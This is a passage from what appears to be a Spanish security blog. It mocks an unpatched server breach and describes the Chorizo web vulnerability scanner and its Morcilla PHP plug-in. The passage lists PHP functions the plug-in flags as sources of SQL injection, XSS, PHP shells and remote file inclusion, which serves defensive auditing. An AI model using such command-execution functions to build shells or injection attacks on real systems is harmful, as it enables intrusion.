Penitencia: 20 San Ububuntu ilumínamos por cada acceso de usuario y 50 por cada acceso como root/admin en texto claro.

c) The servers have not been upgraded past breezy due to problems with the network card and later kernels. This probably allowed the attacker to gain root.

O sea, que al tener problemas con los drivers, no se podía actualizar el hardware y debido a ello, todos los fallos de seguridad de los últimos 9 meses y medio, incluidos los que permitían ejecución remota de código y elevación de privilegios han hecho que “probablemente” el atacante fuera root.

Penitencia: 100 San Ubuntu ilumínanos por NO hacer nada sabiendo que estaban en esta situación y dejar que se llegara a esto.

Esto ha pasado por no usar Ubuntu para los servidores en lugar de Debian y además, por no tomar un soporte anual para el servicio. El coste de esto no es tanto hombre, veamos, os cojo soporte para 8 servidores y para 8 desktops, para que podáis currar sin problemas y sale:


Que en Euros son : 28,250.59 EUR

Tras leer toda la historia, esto no deja de recordarme a lo que pasó el año pasado con Gluck en Debian, así que, en honor a los administradores que no parchean los servidores les digo la frase que más me gusto

“you do an excellent job”

Saludos Malignos!

Chorizo y Morcilla

Tengo que reconocer que la primera vez que lo vi “no me lo podía de creel”, pero sí, es así, cuando me lo envío Penyaskito pensé que era una coña, pero no, es un producto de seguridad de verdad y se llama Chorizo Scanner.

El Chorizo

Su funcionamiento es similar a otros productos que funcionan realizando el spidering mediante profile. Es decir, tu navegas a través del Chorizo (como si fuera un proxy) y él va registrando URLs, parámetros, llamadas GET, llamadas POST, ficheros descubiertos, etc… Cuando tengamos a Chorizo conectado nos sale un menú como el que se ve en la imagen de tal manera que al mismo tiempo se pueden ir realizando las pruebas de seguridad para detectar posibles fallos de XSS, SQL-Injections, Cross-Site-Request-Forging , RFI, Information Disclosure, etc…


Ya la herramienta es curiosa de por sí con ese nombre, pero es que han sacado un componente Server-Side que se instala como un plug-in PHP que se llama Morcilla.

La Morcilla

Este componente se lee el código PHP de tu servidor y comprueba la construcción de las funciones que comúnmente son responsables de estos fallos de seguridad:
Las funciones responsables de SQL Injectios, XSS y usadas en PHP_Shells:

mysql_query, mysql_unbuffered_query, mysql_db_query, mysqli_query, mysqli_prepare, mysqli::query, mysqli::prepare, shell_exec, exec, passthru, system, popen, proc_open, preg_replace, preg_replace_callback, usort, array_walk, uasort, mail, fopen, readfile, file_get_contents,...

Así como las funciones que se usan en Inyecciones de Código y RFI (eval() e include), el uso de variables globales y las comprobaciones de valores, comentarios e información mostrada en el código, etc...


El Chorizo junto con la Morcilla son de pago, pero existe una versión gratuita para un dominio con la que puedes conseguir que tu aplicación sea Chorizo Certified!.

¡Saludos Malignos!

PD: Se espera una versión en catalán llamada Butifarra-Edition.